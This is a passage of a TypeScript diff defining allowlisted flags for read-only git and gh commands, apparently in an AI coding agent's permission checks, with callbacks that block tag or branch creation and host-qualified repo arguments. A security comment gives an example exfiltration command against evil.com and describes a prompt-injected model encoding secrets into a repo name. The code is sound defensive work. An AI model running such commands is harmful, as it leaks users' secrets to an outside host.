'-s': 'none',
|
|
423
|
+
'--killed': 'none',
|
|
424
|
+
'-k': 'none',
|
|
425
|
+
'--unmerged': 'none',
|
|
426
|
+
'-u': 'none',
|
|
427
|
+
// Output format
|
|
428
|
+
'--directory': 'none',
|
|
429
|
+
'--no-empty-directory': 'none',
|
|
430
|
+
'--eol': 'none',
|
|
431
|
+
'--full-name': 'none',
|
|
432
|
+
'--abbrev': 'number',
|
|
433
|
+
'--debug': 'none',
|
|
434
|
+
'-z': 'none',
|
|
435
|
+
'-t': 'none',
|
|
436
|
+
'-v': 'none',
|
|
437
|
+
'-f': 'none',
|
|
438
|
+
// Exclude patterns
|
|
439
|
+
'--exclude': 'string',
|
|
440
|
+
'-x': 'string',
|
|
441
|
+
'--exclude-from': 'string',
|
|
442
|
+
'-X': 'string',
|
|
443
|
+
'--exclude-per-directory': 'string',
|
|
444
|
+
'--exclude-standard': 'none',
|
|
445
|
+
// Error handling
|
|
446
|
+
'--error-unmatch': 'none',
|
|
447
|
+
// Recursion
|
|
448
|
+
'--recurse-submodules': 'none',
|
|
449
|
+
},
|
|
450
|
+
},
|
|
451
|
+
'git config --get': {
|
|
452
|
+
safeFlags: {
|
|
453
|
+
// No additional flags needed - just reading config values
|
|
454
|
+
'--local': 'none',
|
|
455
|
+
'--global': 'none',
|
|
456
|
+
'--system': 'none',
|
|
457
|
+
'--worktree': 'none',
|
|
458
|
+
'--default': 'string',
|
|
459
|
+
'--type': 'string',
|
|
460
|
+
'--bool': 'none',
|
|
461
|
+
'--int': 'none',
|
|
462
|
+
'--bool-or-int': 'none',
|
|
463
|
+
'--path': 'none',
|
|
464
|
+
'--expiry-date': 'none',
|
|
465
|
+
'-z': 'none',
|
|
466
|
+
'--null': 'none',
|
|
467
|
+
'--name-only': 'none',
|
|
468
|
+
'--show-origin': 'none',
|
|
469
|
+
'--show-scope': 'none',
|
|
470
|
+
},
|
|
471
|
+
},
|
|
472
|
+
// NOTE: 'git remote show' must come BEFORE 'git remote' so longer patterns are matched first
|
|
473
|
+
'git remote show': {
|
|
474
|
+
safeFlags: {
|
|
475
|
+
'-n': 'none',
|
|
476
|
+
},
|
|
477
|
+
// Only allow optional -n, then one alphanumeric remote name
|
|
478
|
+
additionalCommandIsDangerousCallback: (
|
|
479
|
+
_rawCommand: string,
|
|
480
|
+
args: string[],
|
|
481
|
+
) => {
|
|
482
|
+
// Filter out the known safe flag
|
|
483
|
+
const positional = args.filter(a => a !== '-n')
|
|
484
|
+
// Must have exactly one positional arg that looks like a remote name
|
|
485
|
+
if (positional.length !== 1) return true
|
|
486
|
+
return !/^[a-zA-Z0-9_-]+$/.test(positional[0]!)
|
|
487
|
+
},
|
|
488
|
+
},
|
|
489
|
+
'git remote': {
|
|
490
|
+
safeFlags: {
|
|
491
|
+
'-v': 'none',
|
|
492
|
+
'--verbose': 'none',
|
|
493
|
+
},
|
|
494
|
+
// Only allow bare 'git remote' or 'git remote -v/--verbose'
|
|
495
|
+
additionalCommandIsDangerousCallback: (
|
|
496
|
+
_rawCommand: string,
|
|
497
|
+
args: string[],
|
|
498
|
+
) => {
|
|
499
|
+
// All args must be known safe flags; no positional args allowed
|
|
500
|
+
return args.some(a => a !== '-v' && a !== '--verbose')
|
|
501
|
+
},
|
|
502
|
+
},
|
|
503
|
+
// git merge-base is a read-only command for finding common ancestors
|
|
504
|
+
'git merge-base': {
|
|
505
|
+
safeFlags: {
|
|
506
|
+
'--is-ancestor': 'none', // Check if first commit is ancestor of second
|
|
507
|
+
'--fork-point': 'none', // Find fork point
|
|
508
|
+
'--octopus': 'none', // Find best common ancestors for multiple refs
|
|
509
|
+
'--independent': 'none', // Filter independent refs
|
|
510
|
+
'--all': 'none', // Output all merge bases
|
|
511
|
+
},
|
|
512
|
+
},
|
|
513
|
+
// git rev-parse is a pure read command — resolves refs to SHAs, queries repo paths
|
|
514
|
+
'git rev-parse': {
|
|
515
|
+
safeFlags: {
|
|
516
|
+
// SHA resolution and verification
|
|
517
|
+
'--verify': 'none', // Verify that exactly one argument is a valid object name
|
|
518
|
+
'--short': 'string', // Abbreviate output (optional length via =N)
|
|
519
|
+
'--abbrev-ref': 'none', // Symbolic name of ref
|
|
520
|
+
'--symbolic': 'none', // Output symbolic names
|
|
521
|
+
'--symbolic-full-name': 'none', // Full symbolic name including refs/heads/ prefix
|
|
522
|
+
// Repository path queries (all read-only)
|
|
523
|
+
'--show-toplevel': 'none', // Absolute path of top-level directory
|
|
524
|
+
'--show-cdup': 'none', // Path components to traverse up to top-level
|
|
525
|
+
'--show-prefix': 'none', // Relative path from top-level to cwd
|
|
526
|
+
'--git-dir': 'none', // Path to .git directory
|
|
527
|
+
'--git-common-dir': 'none', // Path to common directory (.git in main worktree)
|
|
528
|
+
'--absolute-git-dir': 'none', // Absolute path to .git directory
|
|
529
|
+
'--show-superproject-working-tree': 'none', // Superproject root (if submodule)
|
|
530
|
+
// Boolean queries
|
|
531
|
+
'--is-inside-work-tree': 'none',
|
|
532
|
+
'--is-inside-git-dir': 'none',
|
|
533
|
+
'--is-bare-repository': 'none',
|
|
534
|
+
'--is-shallow-repository': 'none',
|
|
535
|
+
'--is-shallow-update': 'none',
|
|
536
|
+
'--path-prefix': 'none',
|
|
537
|
+
},
|
|
538
|
+
},
|
|
539
|
+
// git rev-list is read-only commit enumeration — lists/counts commits reachable from refs
|
|
540
|
+
'git rev-list': {
|
|
541
|
+
safeFlags: {
|
|
542
|
+
...GIT_REF_SELECTION_FLAGS,
|
|
543
|
+
...GIT_DATE_FILTER_FLAGS,
|
|
544
|
+
...GIT_COUNT_FLAGS,
|
|
545
|
+
...GIT_AUTHOR_FILTER_FLAGS,
|
|
546
|
+
// Counting
|
|
547
|
+
'--count': 'none', // Output commit count instead of listing
|
|
548
|
+
// Traversal control
|
|
549
|
+
'--reverse': 'none',
|
|
550
|
+
'--first-parent': 'none',
|
|
551
|
+
'--ancestry-path': 'none',
|
|
552
|
+
'--merges': 'none',
|
|
553
|
+
'--no-merges': 'none',
|
|
554
|
+
'--min-parents': 'number',
|
|
555
|
+
'--max-parents': 'number',
|
|
556
|
+
'--no-min-parents': 'none',
|
|
557
|
+
'--no-max-parents': 'none',
|
|
558
|
+
'--skip': 'number',
|
|
559
|
+
'--max-age': 'number',
|
|
560
|
+
'--min-age': 'number',
|
|
561
|
+
'--walk-reflogs': 'none',
|
|
562
|
+
// Output formatting
|
|
563
|
+
'--oneline': 'none',
|
|
564
|
+
'--abbrev-commit': 'none',
|
|
565
|
+
'--pretty': 'string',
|
|
566
|
+
'--format': 'string',
|
|
567
|
+
'--abbrev': 'number',
|
|
568
|
+
'--full-history': 'none',
|
|
569
|
+
'--dense': 'none',
|
|
570
|
+
'--sparse': 'none',
|
|
571
|
+
'--source': 'none',
|
|
572
|
+
'--graph': 'none',
|
|
573
|
+
},
|
|
574
|
+
},
|
|
575
|
+
// git describe is read-only — describes commits relative to the most recent tag
|
|
576
|
+
'git describe': {
|
|
577
|
+
safeFlags: {
|
|
578
|
+
// Tag selection
|
|
579
|
+
'--tags': 'none', // Consider all tags, not just annotated
|
|
580
|
+
'--match': 'string', // Only consider tags matching the glob pattern
|
|
581
|
+
'--exclude': 'string', // Do not consider tags matching the glob pattern
|
|
582
|
+
// Output control
|
|
583
|
+
'--long': 'none', // Always output long format (tag-distance-ghash)
|
|
584
|
+
'--abbrev': 'number', // Abbreviate objectname to N hex digits
|
|
585
|
+
'--always': 'none', // Show uniquely abbreviated object as fallback
|
|
586
|
+
'--contains': 'none', // Find tag that comes after the commit
|
|
587
|
+
'--first-match': 'none', // Prefer tags closest to the tip (stops after first match)
|
|
588
|
+
'--exact-match': 'none', // Only output if an exact match (tag points at commit)
|
|
589
|
+
'--candidates': 'number', // Limit walk before selecting best candidates
|
|
590
|
+
// Suffix/dirty markers
|
|
591
|
+
'--dirty': 'none', // Append "-dirty" if working tree has modifications
|
|
592
|
+
'--broken': 'none', // Append "-broken" if repository is in invalid state
|
|
593
|
+
},
|
|
594
|
+
},
|
|
595
|
+
// git cat-file is read-only object inspection — displays type, size, or content of objects
|
|
596
|
+
// NOTE: --batch (without --check) is intentionally excluded — it reads arbitrary objects
|
|
597
|
+
// from stdin which could be exploited in piped commands to dump sensitive objects.
|
|
598
|
+
'git cat-file': {
|
|
599
|
+
safeFlags: {
|
|
600
|
+
// Object query modes (all purely read-only)
|
|
601
|
+
'-t': 'none', // Print type of object
|
|
602
|
+
'-s': 'none', // Print size of object
|
|
603
|
+
'-p': 'none', // Pretty-print object contents
|
|
604
|
+
'-e': 'none', // Exit with zero if object exists, non-zero otherwise
|
|
605
|
+
// Batch mode — read-only check variant only
|
|
606
|
+
'--batch-check': 'none', // For each object on stdin, print type and size (no content)
|
|
607
|
+
// Output control
|
|
608
|
+
'--allow-undetermined-type': 'none',
|
|
609
|
+
},
|
|
610
|
+
},
|
|
611
|
+
// git for-each-ref is read-only ref iteration — lists refs with optional formatting and filtering
|
|
612
|
+
'git for-each-ref': {
|
|
613
|
+
safeFlags: {
|
|
614
|
+
// Output formatting
|
|
615
|
+
'--format': 'string', // Format string using %(fieldname) placeholders
|
|
616
|
+
// Sorting
|
|
617
|
+
'--sort': 'string', // Sort by key (e.g., refname, creatordate, version:refname)
|
|
618
|
+
// Limiting
|
|
619
|
+
'--count': 'number', // Limit output to at most N refs
|
|
620
|
+
// Filtering
|
|
621
|
+
'--contains': 'string', // Only list refs that contain specified commit
|
|
622
|
+
'--no-contains': 'string', // Only list refs that do NOT contain specified commit
|
|
623
|
+
'--merged': 'string', // Only list refs reachable from specified commit
|
|
624
|
+
'--no-merged': 'string', // Only list refs NOT reachable from specified commit
|
|
625
|
+
'--points-at': 'string', // Only list refs pointing at specified object
|
|
626
|
+
},
|
|
627
|
+
},
|
|
628
|
+
// git grep is read-only — searches tracked files for patterns
|
|
629
|
+
'git grep': {
|
|
630
|
+
safeFlags: {
|
|
631
|
+
// Pattern matching modes
|
|
632
|
+
'-e': 'string', // Pattern
|
|
633
|
+
'-E': 'none', // Extended regexp
|
|
634
|
+
'--extended-regexp': 'none',
|
|
635
|
+
'-G': 'none', // Basic regexp (default)
|
|
636
|
+
'--basic-regexp': 'none',
|
|
637
|
+
'-F': 'none', // Fixed strings
|
|
638
|
+
'--fixed-strings': 'none',
|
|
639
|
+
'-P': 'none', // Perl regexp
|
|
640
|
+
'--perl-regexp': 'none',
|
|
641
|
+
// Match control
|
|
642
|
+
'-i': 'none', // Ignore case
|
|
643
|
+
'--ignore-case': 'none',
|
|
644
|
+
'-v': 'none', // Invert match
|
|
645
|
+
'--invert-match': 'none',
|
|
646
|
+
'-w': 'none', // Word regexp
|
|
647
|
+
'--word-regexp': 'none',
|
|
648
|
+
// Output control
|
|
649
|
+
'-n': 'none', // Line number
|
|
650
|
+
'--line-number': 'none',
|
|
651
|
+
'-c': 'none', // Count
|
|
652
|
+
'--count': 'none',
|
|
653
|
+
'-l': 'none', // Files with matches
|
|
654
|
+
'--files-with-matches': 'none',
|
|
655
|
+
'-L': 'none', // Files without match
|
|
656
|
+
'--files-without-match': 'none',
|
|
657
|
+
'-h': 'none', // No filename
|
|
658
|
+
'-H': 'none', // With filename
|
|
659
|
+
'--heading': 'none',
|
|
660
|
+
'--break': 'none',
|
|
661
|
+
'--full-name': 'none',
|
|
662
|
+
'--color': 'none',
|
|
663
|
+
'--no-color': 'none',
|
|
664
|
+
'-o': 'none', // Only matching
|
|
665
|
+
'--only-matching': 'none',
|
|
666
|
+
// Context
|
|
667
|
+
'-A': 'number', // After context
|
|
668
|
+
'--after-context': 'number',
|
|
669
|
+
'-B': 'number', // Before context
|
|
670
|
+
'--before-context': 'number',
|
|
671
|
+
'-C': 'number', // Context
|
|
672
|
+
'--context': 'number',
|
|
673
|
+
// Boolean operators for multi-pattern
|
|
674
|
+
'--and': 'none',
|
|
675
|
+
'--or': 'none',
|
|
676
|
+
'--not': 'none',
|
|
677
|
+
// Scope control
|
|
678
|
+
'--max-depth': 'number',
|
|
679
|
+
'--untracked': 'none',
|
|
680
|
+
'--no-index': 'none',
|
|
681
|
+
'--recurse-submodules': 'none',
|
|
682
|
+
'--cached': 'none',
|
|
683
|
+
// Threads
|
|
684
|
+
'--threads': 'number',
|
|
685
|
+
// Quiet
|
|
686
|
+
'-q': 'none',
|
|
687
|
+
'--quiet': 'none',
|
|
688
|
+
},
|
|
689
|
+
},
|
|
690
|
+
// git stash show is read-only — displays diff of a stash entry
|
|
691
|
+
'git stash show': {
|
|
692
|
+
safeFlags: {
|
|
693
|
+
...GIT_STAT_FLAGS,
|
|
694
|
+
...GIT_COLOR_FLAGS,
|
|
695
|
+
...GIT_PATCH_FLAGS,
|
|
696
|
+
// Diff options
|
|
697
|
+
'--word-diff': 'none',
|
|
698
|
+
'--word-diff-regex': 'string',
|
|
699
|
+
'--diff-filter': 'string',
|
|
700
|
+
'--abbrev': 'number',
|
|
701
|
+
},
|
|
702
|
+
},
|
|
703
|
+
// git worktree list is read-only — lists linked working trees
|
|
704
|
+
'git worktree list': {
|
|
705
|
+
safeFlags: {
|
|
706
|
+
'--porcelain': 'none',
|
|
707
|
+
'-v': 'none',
|
|
708
|
+
'--verbose': 'none',
|
|
709
|
+
'--expire': 'string',
|
|
710
|
+
},
|
|
711
|
+
},
|
|
712
|
+
'git tag': {
|
|
713
|
+
safeFlags: {
|
|
714
|
+
// List mode flags
|
|
715
|
+
'-l': 'none',
|
|
716
|
+
'--list': 'none',
|
|
717
|
+
'-n': 'number',
|
|
718
|
+
'--contains': 'string',
|
|
719
|
+
'--no-contains': 'string',
|
|
720
|
+
'--merged': 'string',
|
|
721
|
+
'--no-merged': 'string',
|
|
722
|
+
'--sort': 'string',
|
|
723
|
+
'--format': 'string',
|
|
724
|
+
'--points-at': 'string',
|
|
725
|
+
'--column': 'none',
|
|
726
|
+
'--no-column': 'none',
|
|
727
|
+
'-i': 'none',
|
|
728
|
+
'--ignore-case': 'none',
|
|
729
|
+
},
|
|
730
|
+
// SECURITY: Block tag creation via positional arguments. `git tag foo`
|
|
731
|
+
// creates .git/refs/tags/foo (41-byte file write) — NOT read-only.
|
|
732
|
+
// This is identical semantics to `git branch foo` (which has the same
|
|
733
|
+
// callback below). Without this callback, validateFlags's default
|
|
734
|
+
// positional-arg fallthrough at ~:1730 accepts `mytag` as a non-flag arg,
|
|
735
|
+
// and git tag auto-approves. While the write is constrained (path limited
|
|
736
|
+
// to .git/refs/tags/, content is fixed HEAD SHA), it violates the
|
|
737
|
+
// read-only invariant and can pollute CI/CD tag-pattern matching or make
|
|
738
|
+
// abandoned commits reachable via `git tag foo <commit>`.
|
|
739
|
+
additionalCommandIsDangerousCallback: (
|
|
740
|
+
_rawCommand: string,
|
|
741
|
+
args: string[],
|
|
742
|
+
) => {
|
|
743
|
+
// Safe uses: `git tag` (list), `git tag -l pattern` (list filtered),
|
|
744
|
+
// `git tag --contains <ref>` (list containing). A bare positional arg
|
|
745
|
+
// without -l/--list is a tag name to CREATE — dangerous.
|
|
746
|
+
const flagsWithArgs = new Set([
|
|
747
|
+
'--contains',
|
|
748
|
+
'--no-contains',
|
|
749
|
+
'--merged',
|
|
750
|
+
'--no-merged',
|
|
751
|
+
'--points-at',
|
|
752
|
+
'--sort',
|
|
753
|
+
'--format',
|
|
754
|
+
'-n',
|
|
755
|
+
])
|
|
756
|
+
let i = 0
|
|
757
|
+
let seenListFlag = false
|
|
758
|
+
let seenDashDash = false
|
|
759
|
+
while (i < args.length) {
|
|
760
|
+
const token = args[i]
|
|
761
|
+
if (!token) {
|
|
762
|
+
i++
|
|
763
|
+
continue
|
|
764
|
+
}
|
|
765
|
+
// `--` ends flag parsing. All subsequent tokens are positional args,
|
|
766
|
+
// even if they start with `-`. `git tag -- -l` CREATES a tag named `-l`.
|
|
767
|
+
if (token === '--' && !seenDashDash) {
|
|
768
|
+
seenDashDash = true
|
|
769
|
+
i++
|
|
770
|
+
continue
|
|
771
|
+
}
|
|
772
|
+
if (!seenDashDash && token.startsWith('-')) {
|
|
773
|
+
// Check for -l/--list (exact or in a bundle). `-li` bundles -l and
|
|
774
|
+
// -i — both 'none' type. Array.includes('-l') exact-matches, missing
|
|
775
|
+
// bundles like `-li`, `-il`. Check individual chars for short bundles.
|
|
776
|
+
if (token === '--list' || token === '-l') {
|
|
777
|
+
seenListFlag = true
|
|
778
|
+
} else if (
|
|
779
|
+
token[0] === '-' &&
|
|
780
|
+
token[1] !== '-' &&
|
|
781
|
+
token.length > 2 &&
|
|
782
|
+
!token.includes('=') &&
|
|
783
|
+
token.slice(1).includes('l')
|
|
784
|
+
) {
|
|
785
|
+
// Short-flag bundle like -li, -il containing 'l'
|
|
786
|
+
seenListFlag = true
|
|
787
|
+
}
|
|
788
|
+
if (token.includes('=')) {
|
|
789
|
+
i++
|
|
790
|
+
} else if (flagsWithArgs.has(token)) {
|
|
791
|
+
i += 2
|
|
792
|
+
} else {
|
|
793
|
+
i++
|
|
794
|
+
}
|
|
795
|
+
} else {
|
|
796
|
+
// Non-flag positional arg (or post-`--` positional). Safe only if
|
|
797
|
+
// preceded by -l/--list (then it's a pattern, not a tag name).
|
|
798
|
+
if (!seenListFlag) {
|
|
799
|
+
return true // Positional arg without --list = tag creation
|
|
800
|
+
}
|
|
801
|
+
i++
|
|
802
|
+
}
|
|
803
|
+
}
|
|
804
|
+
return false
|
|
805
|
+
},
|
|
806
|
+
},
|
|
807
|
+
'git branch': {
|
|
808
|
+
safeFlags: {
|
|
809
|
+
// List mode flags
|
|
810
|
+
'-l': 'none',
|
|
811
|
+
'--list': 'none',
|
|
812
|
+
'-a': 'none',
|
|
813
|
+
'--all': 'none',
|
|
814
|
+
'-r': 'none',
|
|
815
|
+
'--remotes': 'none',
|
|
816
|
+
'-v': 'none',
|
|
817
|
+
'-vv': 'none',
|
|
818
|
+
'--verbose': 'none',
|
|
819
|
+
// Display options
|
|
820
|
+
'--color': 'none',
|
|
821
|
+
'--no-color': 'none',
|
|
822
|
+
'--column': 'none',
|
|
823
|
+
'--no-column': 'none',
|
|
824
|
+
// SECURITY: --abbrev stays 'number' so validateFlags accepts --abbrev=N
|
|
825
|
+
// (attached form, safe). The DETACHED form `--abbrev N` is the bug:
|
|
826
|
+
// git uses PARSE_OPT_OPTARG (optional-attached only) — detached N becomes
|
|
827
|
+
// a POSITIONAL branch name, creating .git/refs/heads/N. validateFlags
|
|
828
|
+
// with 'number' consumes N, but the CALLBACK below catches it: --abbrev
|
|
829
|
+
// is NOT in callback's flagsWithArgs (removed), so callback sees N as a
|
|
830
|
+
// positional without list flag → dangerous. Two-layer defense: validate-
|
|
831
|
+
// Flags accepts both forms, callback blocks detached.
|
|
832
|
+
'--abbrev': 'number',
|
|
833
|
+
'--no-abbrev': 'none',
|
|
834
|
+
// Filtering - these take commit/ref arguments
|
|
835
|
+
'--contains': 'string',
|
|
836
|
+
'--no-contains': 'string',
|
|
837
|
+
'--merged': 'none', // Optional commit argument - handled in callback
|
|
838
|
+
'--no-merged': 'none', // Optional commit argument - handled in callback
|
|
839
|
+
'--points-at': 'string',
|
|
840
|
+
// Sorting
|
|
841
|
+
'--sort': 'string',
|
|
842
|
+
// Note: --format is intentionally excluded as it could pose security risks
|
|
843
|
+
// Show current
|
|
844
|
+
'--show-current': 'none',
|
|
845
|
+
'-i': 'none',
|
|
846
|
+
'--ignore-case': 'none',
|
|
847
|
+
},
|
|
848
|
+
// Block branch creation via positional arguments (e.g., "git branch newbranch")
|
|
849
|
+
// Flag validation is handled by safeFlags above
|
|
850
|
+
// args is tokens after "git branch"
|
|
851
|
+
additionalCommandIsDangerousCallback: (
|
|
852
|
+
_rawCommand: string,
|
|
853
|
+
args: string[],
|
|
854
|
+
) => {
|
|
855
|
+
// Block branch creation: "git branch <name>" or "git branch <name> <start-point>"
|
|
856
|
+
// Only safe uses are: "git branch" (list), "git branch -flags" (list with options),
|
|
857
|
+
// or "git branch --contains/--merged/etc <ref>" (filtering)
|
|
858
|
+
// Flags that require an argument
|
|
859
|
+
const flagsWithArgs = new Set([
|
|
860
|
+
'--contains',
|
|
861
|
+
'--no-contains',
|
|
862
|
+
'--points-at',
|
|
863
|
+
'--sort',
|
|
864
|
+
// --abbrev REMOVED: git does NOT consume detached arg (PARSE_OPT_OPTARG)
|
|
865
|
+
])
|
|
866
|
+
// Flags with optional arguments (don't require, but can take one)
|
|
867
|
+
const flagsWithOptionalArgs = new Set(['--merged', '--no-merged'])
|
|
868
|
+
let i = 0
|
|
869
|
+
let lastFlag = ''
|
|
870
|
+
let seenListFlag = false
|
|
871
|
+
let seenDashDash = false
|
|
872
|
+
while (i < args.length) {
|
|
873
|
+
const token = args[i]
|
|
874
|
+
if (!token) {
|
|
875
|
+
i++
|
|
876
|
+
continue
|
|
877
|
+
}
|
|
878
|
+
// `--` ends flag parsing. `git branch -- -l` CREATES a branch named `-l`.
|
|
879
|
+
if (token === '--' && !seenDashDash) {
|
|
880
|
+
seenDashDash = true
|
|
881
|
+
lastFlag = ''
|
|
882
|
+
i++
|
|
883
|
+
continue
|
|
884
|
+
}
|
|
885
|
+
if (!seenDashDash && token.startsWith('-')) {
|
|
886
|
+
// Check for -l/--list including short-flag bundles (-li, -la, etc.)
|
|
887
|
+
if (token === '--list' || token === '-l') {
|
|
888
|
+
seenListFlag = true
|
|
889
|
+
} else if (
|
|
890
|
+
token[0] === '-' &&
|
|
891
|
+
token[1] !== '-' &&
|
|
892
|
+
token.length > 2 &&
|
|
893
|
+
!token.includes('=') &&
|
|
894
|
+
token.slice(1).includes('l')
|
|
895
|
+
) {
|
|
896
|
+
seenListFlag = true
|
|
897
|
+
}
|
|
898
|
+
if (token.includes('=')) {
|
|
899
|
+
lastFlag = token.split('=')[0] || ''
|
|
900
|
+
i++
|
|
901
|
+
} else if (flagsWithArgs.has(token)) {
|
|
902
|
+
lastFlag = token
|
|
903
|
+
i += 2
|
|
904
|
+
} else {
|
|
905
|
+
lastFlag = token
|
|
906
|
+
i++
|
|
907
|
+
}
|
|
908
|
+
} else {
|
|
909
|
+
// Non-flag argument (or post-`--` positional) - could be:
|
|
910
|
+
// 1. A branch name (dangerous - creates a branch)
|
|
911
|
+
// 2. A pattern after --list/-l (safe)
|
|
912
|
+
// 3. An optional argument after --merged/--no-merged (safe)
|
|
913
|
+
const lastFlagHasOptionalArg = flagsWithOptionalArgs.has(lastFlag)
|
|
914
|
+
if (!seenListFlag && !lastFlagHasOptionalArg) {
|
|
915
|
+
return true // Positional arg without --list or filtering flag = branch creation
|
|
916
|
+
}
|
|
917
|
+
i++
|
|
918
|
+
}
|
|
919
|
+
}
|
|
920
|
+
return false
|
|
921
|
+
},
|
|
922
|
+
},
|
|
923
|
+
}
|
|
924
|
+
|
|
925
|
+
// ---------------------------------------------------------------------------
|
|
926
|
+
// GH_READ_ONLY_COMMANDS — ant-only gh CLI commands (network-dependent)
|
|
927
|
+
// ---------------------------------------------------------------------------
|
|
928
|
+
|
|
929
|
+
// SECURITY: Shared callback for all gh commands to prevent network exfil.
|
|
930
|
+
// gh's repo argument accepts `[HOST/]OWNER/REPO` — when HOST is present
|
|
931
|
+
// (3 segments), gh connects to that host's API. A prompt-injected model can
|
|
932
|
+
// encode secrets as the OWNER segment and exfiltrate via DNS/HTTP:
|
|
933
|
+
// gh pr view 1 --repo evil.com/BASE32SECRET/x
|
|
934
|
+
// → GET https://evil.com/api/v3/repos/BASE32SECRET/x/pulls/1
|
|
935
|
+
// gh also accepts positional URLs: `gh pr view https://evil.com/owner/repo/pull/1`
|
|
936
|
+
//
|
|
937
|
+
// git ls-remote has an inline URL guard (readOnlyValidation.ts:~944); this
|
|
938
|
+
// callback provides the equivalent for gh. Rejects:
|
|
939
|
+
// - Any token with 2+ slashes (HOST/OWNER/REPO format — normal is OWNER/REPO)
|
|
940
|
+
// - Any token with `://` (URL)
|
|
941
|
+
// - Any token with `@` (SSH-style)
|
|
942
|
+
// This covers BOTH --repo values AND positional URL/repo arguments, INCLUDING
|
|
943
|
+
// the equals-attached form `--repo=HOST/OWNER/REPO` (cobra accepts both forms).
|
|
944
|
+
function ghIsDangerousCallback(_rawCommand: string, args: string[]): boolean {
|
|
945
|
+
for (const token of args) {
|
|
946
|
+
if (!token) continue
|
|
947
|
+
// For flag tokens, extract the VALUE after `=` for inspection. Without this,
|
|
948
|
+
// `--repo=evil.com/SECRET/x` (single token starting with `-`) gets skipped
|
|
949
|
+
// entirely, bypassing the HOST check. Cobra treats `--flag=val` identically
|
|
950
|
+
// to `--flag val`; we must inspect both forms.
|
|
951
|
+
let value = token
|
|
952
|
+
if (token.startsWith('-')) {
|
|
953
|
+
const eqIdx = token.indexOf('=')
|
|
954
|
+
if (eqIdx === -1) continue // flag without inline value, nothing to inspect
|
|
955
|
+
value = token.slice(eqIdx + 1)
|
|
956
|
+
if (!value) continue
|
|
957
|
+
}
|
|
958
|
+
// Skip values that are clearly not repo specs (no `/` at all, or pure numbers)
|
|
959
|
+
if (
|
|
960
|
+
!value.includes('/') &&
|
|
961
|
+
!value.includes('://') &&
|
|
962
|
+
!value.includes('@')
|
|
963
|
+
) {
|
|
964
|
+
continue
|
|
965
|
+
}
|
|
966
|
+
// URL schemes: https://, http://, git://, ssh://
|
|
967
|
+
if (value.includes('://')) {
|
|
968
|
+
return true
|
|
969
|
+
}
|
|
970
|
+
// SSH-style: git@host:owner/repo
|
|
971
|
+
if (value.includes('@')) {
|
|
972
|
+
return true
|
|
973
|
+
}
|
|
974
|
+
// 3+ segments = HOST/OWNER/REPO (normal gh format is OWNER/REPO, 1 slash)
|
|
975
|
+
// Count slashes: 2+ slashes means 3+ segments
|
|
976
|
+
const slashCount = (value.match(/\//g) || []).length
|
|
977
|
+
if (slashCount >= 2) {
|
|
978
|
+
return true
|
|
979
|
+
}
|
|
980
|
+
}
|
|
981
|
+
return false
|
|
982
|
+
}
|
|
983
|
+
|
|
984
|
+
export const GH_READ_ONLY_COMMANDS: Record<string, ExternalCommandConfig> = {
|
|
985
|
+
// gh pr view is read-only — displays pull request details
|
|
986
|
+
'gh pr view': {
|
|
987
|
+
safeFlags: {
|
|
988
|
+
'--json': 'string', // JSON field selection
|
|
989
|
+
'--comments': 'none', // Show comments
|
|
990
|
+
'--repo': 'string', // Target repository (OWNER/REPO)
|
|
991
|
+
'-R': 'string',
|
|
992
|
+
},
|
|
993
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
994
|
+
},
|
|
995
|
+
// gh pr list is read-only — lists pull requests
|
|
996
|
+
'gh pr list': {
|
|
997
|
+
safeFlags: {
|
|
998
|
+
'--state': 'string', // open, closed, merged, all
|
|
999
|
+
'-s': 'string',
|
|
1000
|
+
'--author': 'string',
|
|
1001
|
+
'--assignee': 'string',
|
|
1002
|
+
'--label': 'string',
|
|
1003
|
+
'--limit': 'number',
|
|
1004
|
+
'-L': 'number',
|
|
1005
|
+
'--base': 'string',
|
|
1006
|
+
'--head': 'string',
|
|
1007
|
+
'--search': 'string',
|
|
1008
|
+
'--json': 'string',
|
|
1009
|
+
'--draft': 'none',
|
|
1010
|
+
'--app': 'string',
|
|
1011
|
+
'--repo': 'string',
|
|
1012
|
+
'-R': 'string',
|
|
1013
|
+
},
|
|
1014
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1015
|
+
},
|
|
1016
|
+
// gh pr diff is read-only — shows pull request diff
|
|
1017
|
+
'gh pr diff': {
|
|
1018
|
+
safeFlags: {
|
|
1019
|
+
'--color': 'string',
|
|
1020
|
+
'--name-only': 'none',
|
|
1021
|
+
'--patch': 'none',
|
|
1022
|
+
'--repo': 'string',
|
|
1023
|
+
'-R': 'string',
|
|
1024
|
+
},
|
|
1025
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1026
|
+
},
|
|
1027
|
+
// gh pr checks is read-only — shows CI status checks
|
|
1028
|
+
'gh pr checks': {
|
|
1029
|
+
safeFlags: {
|
|
1030
|
+
'--watch': 'none',
|
|
1031
|
+
'--required': 'none',
|
|
1032
|
+
'--fail-fast': 'none',
|
|
1033
|
+
'--json': 'string',
|
|
1034
|
+
'--interval': 'number',
|
|
1035
|
+
'--repo': 'string',
|
|
1036
|
+
'-R': 'string',
|
|
1037
|
+
},
|
|
1038
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1039
|
+
},
|
|
1040
|
+
// gh issue view is read-only — displays issue details
|
|
1041
|
+
'gh issue view': {
|
|
1042
|
+
safeFlags: {
|
|
1043
|
+
'--json': 'string',
|
|
1044
|
+
'--comments': 'none',
|
|
1045
|
+
'--repo': 'string',
|
|
1046
|
+
'-R': 'string',
|
|
1047
|
+
},
|
|
1048
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1049
|
+
},
|
|
1050
|
+
// gh issue list is read-only — lists issues
|
|
1051
|
+
'gh issue list': {
|
|
1052
|
+
safeFlags: {
|
|
1053
|
+
'--state': 'string',
|
|
1054
|
+
'-s': 'string',
|
|
1055
|
+
'--assignee': 'string',
|
|
1056
|
+
'--author': 'string',
|
|
1057
|
+
'--label': 'string',
|
|
1058
|
+
'--limit': 'number',
|
|
1059
|
+
'-L': 'number',
|
|
1060
|
+
'--milestone': 'string',
|
|
1061
|
+
'--search': 'string',
|
|
1062
|
+
'--json': 'string',
|
|
1063
|
+
'--app': 'string',
|
|
1064
|
+
'--repo': 'string',
|
|
1065
|
+
'-R': 'string',
|
|
1066
|
+
},
|
|
1067
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1068
|
+
},
|
|
1069
|
+
// gh repo view is read-only — displays repository details
|
|
1070
|
+
